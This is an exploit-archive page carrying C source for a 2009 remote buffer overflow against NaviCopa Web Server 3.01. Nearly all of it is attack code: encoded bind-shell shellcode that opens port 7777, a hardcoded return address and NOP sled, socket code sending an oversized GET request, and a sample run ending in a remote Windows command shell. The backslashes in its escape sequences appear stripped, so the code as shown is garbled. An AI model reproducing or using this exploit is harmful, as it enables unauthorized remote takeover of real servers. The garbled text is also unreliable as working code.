[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit
# Published : 2009-08-24
# Author : SimO-s0fT
# Previous Title : Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities
# Next Title : Huawei SmartAX MT880 Multiple XSRF Vulnerabilities
/* navicpnt_xp1.c
* NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit
* Cresit : http://milw0rm.com/exploits/7966 >> Thanks To: e.wiZz!
*
* Coded by : SimO-s0fT >> Madridista ;)
* E-mail : Overflows[at]Hotmail[dot]com
* Tested on Windows XP SP2 Francais , Win2k SP4 english
* Example :
C:Documents and SettingsSimo>navicpnt_xp1.exe 196.217.213.25
* ________________________________________________________________________________
*
* NaviCopa 3.01 Remote Buffer Overflow Exploit
* Coded By : SimO-s0fT [overflows@hotmail.com ]
*
* ____________________________________________________________________________
*
* [+] Connection established
* [+] Sending data... [Done]
*
* C:Documents and SettingsSimo>telnet 196.217.213.25 7777
* Microsoft Windows XP [version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* Peace out
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#define SOCKET int
#define closesocket(s) close(s)
#endif
/* Bind Shell open port 7777 */
char scode[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
#define OFFSET 232
#define NOP 0x90
int main(int argc, char *argv[]){
SOCKET s;
char *buffer;
struct sockaddr_in their_addr;
WSADATA wsa;
char cmd_1[]="GET ";
char cmd_2[]=" HTTP/1.1rnrnx00";
char Nop[40];
int i=0;
int ret_addr=0x7c9d2643;
system("CLS");
fprintf(stdout,"_________________________________________________________________________________________________________________nn");
fprintf(stdout,"t NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit nt Coded By : SimO-s0fT [overflows@hotmail.com ]nn");
fprintf(stdout,"_________________________________________________________________________________________________________________nn");
if(argc!=2){
printf("USAGE : %s [IP ADDRESSE]n",argv[0]);
printf("Example: navicpnt_xp1.exe 196.217.213.25n");
}
if(WSAStartup(MAKEWORD(2, 0), &wsa) ==0){
if((s =socket(AF_INET ,SOCK_STREAM, IPPROTO_TCP)) !=-1){
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = inet_addr(argv[1]);
their_addr.sin_port = htons(80);
if(connect (s , (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) !=-1){
printf("[+] Connection establishedn");
buffer = (char*) malloc (4 + OFFSET +4+strlen(scode)+ strlen(cmd_2)+strlen(Nop));
memset(buffer,0x41, 4 + OFFSET + 4+strlen(scode)+ strlen(cmd_2)+strlen(Nop));
memcpy(buffer,cmd_1,4);
i=4;
i=0; i=OFFSET;
memcpy(buffer+i,&ret_addr,4);
i+=4;
memset(buffer+i,0x90,strlen(Nop));
i+=40;
memcpy(buffer+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+i,cmd_2,strlen(cmd_2));
i+=strlen(cmd_2);
if(send(s,buffer,strlen(buffer), 0) !=-1){
printf("[+] Sending data... ");
printf("[Done]n");
} else printf("[-] Send errorn");
} else printf("[-]Connect error n");
} else printf("[-]Socket error n");
} else printf("[-] WSAStartup errorn");
closesocket(s);
WSACleanup();
free(buffer);
return 0;
}
// www.Syue.com [2009-08-24]